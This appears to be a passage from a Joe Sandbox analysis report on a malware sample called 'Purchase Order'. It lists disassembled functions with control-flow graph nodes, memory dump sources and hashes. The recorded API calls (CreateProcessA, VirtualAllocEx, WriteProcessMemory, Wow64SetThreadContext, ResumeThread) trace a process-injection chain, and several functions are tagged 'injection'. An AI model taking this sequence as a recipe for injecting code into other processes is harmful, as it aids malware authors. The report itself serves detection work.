                                                                                                            control_flow_graph 857 5300f98-530102d 859 5301066-5301086 857->859 860 530102f-5301039 857->860 867 5301088-5301092 859->867 868 53010bf-53010ee 859->868 860->859 861 530103b-530103d 860->861 862 5301060-5301063 861->862 863 530103f-5301049 861->863 862->859 865 530104b 863->865 866 530104d-530105c 863->866 865->866 866->866 869 530105e 866->869 867->868 870 5301094-5301096 867->870 874 53010f0-53010fa 868->874 875 5301127-53011e1 CreateProcessA 868->875 869->862 872 5301098-53010a2 870->872 873 53010b9-53010bc 870->873 876 53010a4 872->876 877 53010a6-53010b5 872->877 873->868 874->875 878 53010fc-53010fe 874->878 888 53011e3-53011e9 875->888 889 53011ea-5301270 875->889 876->877 877->877 879 53010b7 877->879 880 5301100-530110a 878->880 881 5301121-5301124 878->881 879->873 883 530110c 880->883 884 530110e-530111d 880->884 881->875 883->884 884->884 885 530111f 884->885 885->881 888->889 899 5301280-5301284 889->899 900 5301272-5301276 889->900 902 5301294-5301298 899->902 903 5301286-530128a 899->903 900->899 901 5301278 900->901 901->899 905 53012a8-53012ac 902->905 906 530129a-530129e 902->906 903->902 904 530128c 903->904 904->902 908 53012be-53012c5 905->908 909 53012ae-53012b4 905->909 906->905 907 53012a0 906->907 907->905 910 53012c7-53012d6 908->910 911 53012dc 908->911 909->908 910->911 913 53012dd 911->913 913->913
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 053011CE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 81ad92472dd42c08cc78cae715507f80c3368dc969a8103182901cce6a6ef32e
                                                                                                            • Instruction ID: 8f44b1281ed93dbfa4df4b20211bc5f5e620db571d5a6113180e410ed9b02094
                                                                                                            • Opcode Fuzzy Hash: 81ad92472dd42c08cc78cae715507f80c3368dc969a8103182901cce6a6ef32e
                                                                                                            • Instruction Fuzzy Hash: 0B915B71D003199FDB24DFA9CC91BEEBBB2BF48314F148169E849A7280DB749985CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0190ADA8 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 914 190ada8-190adb7 915 190ade3-190ade7 914->915 916 190adb9-190adc6 call 190a0cc 914->916 918 190ade9-190adf3 915->918 919 190adfb-190ae3c 915->919 922 190adc8 916->922 923 190addc 916->923 918->919 925 190ae49-190ae57 919->925 926 190ae3e-190ae46 919->926 973 190adce call 190b040 922->973 974 190adce call 190b031 922->974 923->915 927 190ae59-190ae5e 925->927 928 190ae7b-190ae7d 925->928 926->925 931 190ae60-190ae67 call 190a0d8 927->931 932 190ae69 927->932 930 190ae80-190ae87 928->930 929 190add4-190add6 929->923 933 190af18-190af94 929->933 935 190ae94-190ae9b 930->935 936 190ae89-190ae91 930->936 937 190ae6b-190ae79 931->937 932->937 964 190afc0-190afd8 933->964 965 190af96 933->965 940 190aea8-190aeaa call 190a0e8 935->940 941 190ae9d-190aea5 935->941 936->935 937->930 943 190aeaf-190aeb1 940->943 941->940 945 190aeb3-190aebb 943->945 946 190aebe-190aec3 943->946 945->946 947 190aee1-190aeee 946->947 948 190aec5-190aecc 946->948 955 190aef0-190af0e 947->955 956 190af11-190af17 947->956 948->947 950 190aece-190aede call 190a0f8 call 190a108 948->950 950->947 955->956 968 190afe0-190b00b GetModuleHandleW 964->968 969 190afda-190afdd 964->969 966 190af98-190af9c 965->966 967 190af9d-190afbe 965->967 966->967 967->964 970 190b014-190b028 968->970 971 190b00d-190b013 968->971 969->968 971->970 973->929 974->929
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0190AFFE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1732264506.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1900000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 6d60f10b3f3991d8e788b72bf0e30743980bdd09c19b1b59482ca78a5c8d3eb6
                                                                                                            • Instruction ID: b8445f8afce87259b633217703a1188c47716492ca4c73d339a5bd9cb376fa9b
                                                                                                            • Opcode Fuzzy Hash: 6d60f10b3f3991d8e788b72bf0e30743980bdd09c19b1b59482ca78a5c8d3eb6
                                                                                                            • Instruction Fuzzy Hash: 5C8167B0A00B058FD725DF29D44479ABBF5FF88304F008A2ED58AD7A91DB75E849CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586A6C8 Relevance: 1.7, Strings: 1, Instructions: 449COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: #o-m^
                                                                                                            • API String ID: 0-3330988397
                                                                                                            • Opcode ID: 177d4e72e0f65d8d31f6d9e8a2c5d1272d3a280d7d810cc479abdeee7dd4d479
                                                                                                            • Instruction ID: 80abb05d167b8ce818c10b144c9e520f5888c08bcbb6bd247e9d60d2688ed0cf
                                                                                                            • Opcode Fuzzy Hash: 177d4e72e0f65d8d31f6d9e8a2c5d1272d3a280d7d810cc479abdeee7dd4d479
                                                                                                            • Instruction Fuzzy Hash: C41250B0E09FC65ADB78AF64898839EB690BB07305F204D1FCCFAC9255DB349486DB45
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0190590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1264 190590c-1905916 1265 1905918-190591c 1264->1265 1266 190591d-19059d9 CreateActCtxA 1264->1266 1265->1266 1268 19059e2-1905a3c 1266->1268 1269 19059db-19059e1 1266->1269 1276 1905a4b-1905a4f 1268->1276 1277 1905a3e-1905a41 1268->1277 1269->1268 1278 1905a60 1276->1278 1279 1905a51-1905a5d 1276->1279 1277->1276 1281 1905a61 1278->1281 1279->1278 1281->1281
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 019059C9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1732264506.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1900000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: c715cf4b71c2ddf2de3b5748f5812aa5a7c1bcb6a67111fb5c0186a8b613e6b4
                                                                                                            • Instruction ID: 058625e03503076451754f151a9700e95aea9f1f7941a3361d6331e39dfada2e
                                                                                                            • Opcode Fuzzy Hash: c715cf4b71c2ddf2de3b5748f5812aa5a7c1bcb6a67111fb5c0186a8b613e6b4
                                                                                                            • Instruction Fuzzy Hash: 3C41D1B0C0071DCEDB25CFAAC984B8EBBF6BF49704F60806AD408AB255DB756945CF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 019044C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1282 19044c4-19059d9 CreateActCtxA 1286 19059e2-1905a3c 1282->1286 1287 19059db-19059e1 1282->1287 1294 1905a4b-1905a4f 1286->1294 1295 1905a3e-1905a41 1286->1295 1287->1286 1296 1905a60 1294->1296 1297 1905a51-1905a5d 1294->1297 1295->1294 1299 1905a61 1296->1299 1297->1296 1299->1299
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 019059C9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1732264506.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1900000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: 2636b97197289935a542946071a1b1e918afafeb58f37729454f79400352b240
                                                                                                            • Instruction ID: 3abdf56e47092327047c582b52ef39b6f9648557546cc4ba94ff89cfebc83149
                                                                                                            • Opcode Fuzzy Hash: 2636b97197289935a542946071a1b1e918afafeb58f37729454f79400352b240
                                                                                                            • Instruction Fuzzy Hash: 1F41BDB0C0071DCEDB25DFA9C984B9EBBB6BF49704F60806AD408AB251DB756945CF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05300D09 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1300 5300d09-5300d5e 1303 5300d60-5300d6c 1300->1303 1304 5300d6e-5300dad WriteProcessMemory 1300->1304 1303->1304 1306 5300db6-5300de6 1304->1306 1307 5300daf-5300db5 1304->1307 1307->1306
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05300DA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: e5fd4829861fce08926146e50b555b39c8dd4c034d168b5d3e8f8466b9c08169
                                                                                                            • Instruction ID: 4aed79a0e6fa2969f9c473287eb30cb408f06505ac1a801f36198b8c82ef5f1b
                                                                                                            • Opcode Fuzzy Hash: e5fd4829861fce08926146e50b555b39c8dd4c034d168b5d3e8f8466b9c08169
                                                                                                            • Instruction Fuzzy Hash: 97215AB59003099FCB10DFAAC885BDEBBF5FF48310F10842AE959A7240C778A540DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05300D10 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1311 5300d10-5300d5e 1313 5300d60-5300d6c 1311->1313 1314 5300d6e-5300dad WriteProcessMemory 1311->1314 1313->1314 1316 5300db6-5300de6 1314->1316 1317 5300daf-5300db5 1314->1317 1317->1316
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05300DA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: c09785f200746f9682698caa446ebc3dbc05cea9e4ba85bd51bf8dfc380f06fa
                                                                                                            • Instruction ID: bbf0a50af2d78a04aad50dcee9bdef65d2d0ed868afbb5021e10df5b5ae4a38a
                                                                                                            • Opcode Fuzzy Hash: c09785f200746f9682698caa446ebc3dbc05cea9e4ba85bd51bf8dfc380f06fa
                                                                                                            • Instruction Fuzzy Hash: 9C213BB5900309DFCB10DFAAC885BDEBBF5FF48310F50842AE959A7241C778A541DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05300B70 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1321 5300b70-5300bc3 1324 5300bd3-5300c03 Wow64SetThreadContext 1321->1324 1325 5300bc5-5300bd1 1321->1325 1327 5300c05-5300c0b 1324->1327 1328 5300c0c-5300c3c 1324->1328 1325->1324 1327->1328
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05300BF6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: aa6497783fa0dde5ace93410721f1726ddbb773f3dc877968655e880c6d5f4f0
                                                                                                            • Instruction ID: bc7005fc1ccbe7b2d93e9723ec7113796ed540944e8a14a2175ae2fb837fb141
                                                                                                            • Opcode Fuzzy Hash: aa6497783fa0dde5ace93410721f1726ddbb773f3dc877968655e880c6d5f4f0
                                                                                                            • Instruction Fuzzy Hash: 2A2168B1D003098FDB10DFAAC4857EEBBF4EF48324F54842AD459A7241CB789945CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0190D27C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0190D656,?,?,?,?,?), ref: 0190D717
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1732264506.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1900000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 5a16fefbd1aca82eb1410e3673d5994363df4c336d4d12ef69a318223a8b5df4
                                                                                                            • Instruction ID: 3cacdaadd2c6f1ec8b9c6f612f9f9d1388d52442e62dff6054f2f912d7e53b40
                                                                                                            • Opcode Fuzzy Hash: 5a16fefbd1aca82eb1410e3673d5994363df4c336d4d12ef69a318223a8b5df4
                                                                                                            • Instruction Fuzzy Hash: 0421E5B59002489FDB10CF9AD984ADEFFF9EB48310F14845AE918A7350D374A950CFA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05300DF9 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05300E80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: b09329c059d8376a2c955adaf31be79a8eb1d72dd13a11d1f900f2df625c51f7
                                                                                                            • Instruction ID: 8ba29f06379147fd5ade32aa323367b6e3baeaf9ed3efffb87b739bf54adbd62
                                                                                                            • Opcode Fuzzy Hash: b09329c059d8376a2c955adaf31be79a8eb1d72dd13a11d1f900f2df625c51f7
                                                                                                            • Instruction Fuzzy Hash: 8A2128B1D003499FCB10DFAAC885BDEBBF5FF48324F50842AE959A7250C7789500DBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0190D689 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0190D656,?,?,?,?,?), ref: 0190D717
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1732264506.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1900000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: b3af7a47b41cd0d5220f68d4da940ae6e88da492a4d7a0f02b646306883babde
                                                                                                            • Instruction ID: 78d5023dabd466843215b9530b0ad44669655eea9255d2085e7876ea74246823
                                                                                                            • Opcode Fuzzy Hash: b3af7a47b41cd0d5220f68d4da940ae6e88da492a4d7a0f02b646306883babde
                                                                                                            • Instruction Fuzzy Hash: AB2105B59002489FDB10CF9AD984ADEFBF9EB48314F14801AE918A3350C378A940CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05300E00 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05300E80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: 109b53bcfb22f56ee1dc08a3be0dada90224d69774ad4ce2af18b3706fa56855
                                                                                                            • Instruction ID: 917dca68bec93586028a702212e73ccdb9914eaad3cf0496c839cf7ee96f6f73
                                                                                                            • Opcode Fuzzy Hash: 109b53bcfb22f56ee1dc08a3be0dada90224d69774ad4ce2af18b3706fa56855
                                                                                                            • Instruction Fuzzy Hash: 9921F5B1D003499FDB10DFAAC885AEEBBF5FF48320F50842AE559A7250C7799940DBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05300B78 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05300BF6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: c78bdf2e1cc9f4c0144457402a83643ac1bb708177bed594c9f1992fab5736f9
                                                                                                            • Instruction ID: 7d32dd3601b904dc3142bf6462fc3e85679cde815ae399ba6927cbee83ba3730
                                                                                                            • Opcode Fuzzy Hash: c78bdf2e1cc9f4c0144457402a83643ac1bb708177bed594c9f1992fab5736f9
                                                                                                            • Instruction Fuzzy Hash: B32149B1D003098FDB14DFAAC5857EEBBF4EF48324F54842AD419A7241CB789945CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05300C48 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05300CBE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: ca98b81a09beac82eaa9ed7462b9edc8f69b603382b4d1ffbe60f220849ae8c4
                                                                                                            • Instruction ID: e3efba32858eb3bc340bdb574fa8103bc5e6834eb141f9684b22e7fa13440d4d
                                                                                                            • Opcode Fuzzy Hash: ca98b81a09beac82eaa9ed7462b9edc8f69b603382b4d1ffbe60f220849ae8c4
                                                                                                            • Instruction Fuzzy Hash: B21144729002099FCB24DFA9C845AEEBFF5BF88320F20881AE519AB250C7759540DFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0190A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0190B079,00000800,00000000,00000000), ref: 0190B28A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1732264506.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1900000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: 2b116f2f45f1c788467d32d3baf12181c41789ea1292b6d89a8fcb421a980831
                                                                                                            • Instruction ID: 4f7a412d73ec03b1f5009e2f3e6099e7aa47f0fc16262c252fcef8cbeba66bbb
                                                                                                            • Opcode Fuzzy Hash: 2b116f2f45f1c788467d32d3baf12181c41789ea1292b6d89a8fcb421a980831
                                                                                                            • Instruction Fuzzy Hash: 371112B68043099FDB20CF9AC484B9EFBF8EB98320F10842EE519A7240C375A545CFA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0190B219 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0190B079,00000800,00000000,00000000), ref: 0190B28A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1732264506.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1900000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: 60152a14d8011a1cdd382a708f18b0d352fabc5e2a349374200301f2f02c09b0
                                                                                                            • Instruction ID: bb03cf51bfa45298337b9fbc97ca91cc161c7d1d9b9c7fc681fad0225488f819
                                                                                                            • Opcode Fuzzy Hash: 60152a14d8011a1cdd382a708f18b0d352fabc5e2a349374200301f2f02c09b0
                                                                                                            • Instruction Fuzzy Hash: 091114B68003498FDB24DFAAC484ADEFFF4EB58310F14846AD559A7240C375A545CFA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05300C50 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05300CBE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 8a394028daa498af969050f4bb8d081e1f933643c418027bebe464b17d54a8af
                                                                                                            • Instruction ID: 0e5741431fad7cbc01d183f6853e55f36a7a0ccac9d042b37a9ad9ce00366456
                                                                                                            • Opcode Fuzzy Hash: 8a394028daa498af969050f4bb8d081e1f933643c418027bebe464b17d54a8af
                                                                                                            • Instruction Fuzzy Hash: EE1137729003499FCB24DFAAC845BDEBFF5EF88320F24881AE519A7250C775A540DFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05300689 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: 5cf68595f21c769ba09731aea531bc68eba80a253cbb2b93346b2d26a6648b85
                                                                                                            • Instruction ID: 721c9193858db43889bdfb89078b08ff8599e6d82a4fc6bb519d18b6df55d7ea
                                                                                                            • Opcode Fuzzy Hash: 5cf68595f21c769ba09731aea531bc68eba80a253cbb2b93346b2d26a6648b85
                                                                                                            • Instruction Fuzzy Hash: 311158B19003498BDB20DFAAC4857AFFBF9EB88324F248419D419A7240CB79A500CFA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05300690 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: 2c1834d5d27e4018e9f384fb83e3030fa1a9e78616c7fffa419e9963e490495a
                                                                                                            • Instruction ID: 05d677442cf5f395882c1a768365d55dfb5e6ebe32a77add3d030ce2584fb175
                                                                                                            • Opcode Fuzzy Hash: 2c1834d5d27e4018e9f384fb83e3030fa1a9e78616c7fffa419e9963e490495a
                                                                                                            • Instruction Fuzzy Hash: D3113AB1D003498FDB24DFAAC4457AEFBF5EF88324F248419D519A7240CB79A540CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0190AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0190AFFE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1732264506.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1900000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 30249cb0d7bab1fcf0e13877976d48ae7c94a0ef806698c6d962c7174b102cfe
                                                                                                            • Instruction ID: 4ef721cc27b77d058c84d568bad76d546e747e0a2a3c737f53c5631ce279a4ed
                                                                                                            • Opcode Fuzzy Hash: 30249cb0d7bab1fcf0e13877976d48ae7c94a0ef806698c6d962c7174b102cfe
                                                                                                            • Instruction Fuzzy Hash: 72110FB6C003498FDB20CF9AC444B9EFBF8AB88324F10842AD529A7250C379A545CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 053036C8 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0530372D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
